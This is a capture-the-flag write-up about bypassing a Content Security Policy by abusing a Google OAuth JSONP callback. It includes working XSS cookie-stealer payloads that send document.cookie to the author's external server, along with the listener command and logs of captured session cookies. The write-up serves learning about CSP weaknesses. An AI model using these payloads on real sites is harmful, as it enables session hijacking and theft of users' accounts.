I haven't had much of an idea what CSP actually is until trying this
challenge.  How hard could it possibly be to steal someone's cookie?
As it turns out, plenty annoying.  Here's some useful resources I've
found on the topic:

- https://www.slideshare.net/LukasWeichselbaum/breaking-bad-csp
 <- Explains how to attack bad CSP configurations
- https://csp-evaluator.withgoogle.com/ <- Review CSP configuration
- https://github.com/zigoo0/JSONBee <- Find useful JSONP endpoints

The configuration forbids almost everything except for scripts
originating from `*.google.com` and requests performed via XHR/fetch
APIs.  Performing a XHR request cannot be done from an inline script
or a script hosted on your own servers, so I started looking into
whether there's anything hosted at `*.google.com` that might do the
trick.

The JSONBee repository contains two endpoints for that purpose that
accept a callback argument allowing you something looking like a JS
function.  I spent way too much time on the CSE one as it performs
drastic filtering, no amount of encoding made slashes or colons work.
The OAuth one displayed scary looking warnings about permitted
identifiers, but allowed me to execute my standard cookie stealer
code:

   new Image().src='http://x32.be:10000/?c='+document.cookie;

Are we done yet?  Not so fast, assigning an arbitrary image source is
blocked by the CSP policy.  I rewrote the payload to use a `fetch`
request instead:

   <script src="https://accounts.google.com/o/oauth2/revoke?callback=fetch(new%20Request('http://x32.be:10000/c='.concat(document.cookie)))"></script>

A `python -m http.server --bind 0.0.0.0 10000` server successfully
picked up my request, nothing from the admin though.  After pinging
challenge support staff they restarted their bot simulating the admin,
giving me the following requests:

   91.121.107.198 - - [14/Sep/2019 19:45:34] code 404, message File not found
   91.121.107.198 - - [14/Sep/2019 19:45:34] "GET /c=PHPSESSID=ffffffffffffffffffffffffffffffffffff HTTP/1.1" 404 -
   216.165.2.60 - - [14/Sep/2019 19:45:43] code 404, message File not found
   216.165.2.60 - - [14/Sep/2019 19:45:43] "GET /c=session=eyJ1dWlkIjp7IiBiIjoiWW05MGRYTmxjZz09In19.XX0nQQ.LRH1nvri8331RPozt7xMHyOvOc8;%20flag=flag%7Bcsp_will_solve_EVERYTHING%7D HTTP/1.1" 404 -

The flag is in the cookie:

   flag{csp_will_solve_EVERYTHING}

You are viewing proxied material from brause.cc. The copyright of proxied material belongs to its original authors. Any comments or complaints in relation to proxied material should be directed to the original authors of the content concerned. Please see the disclaimer for more details.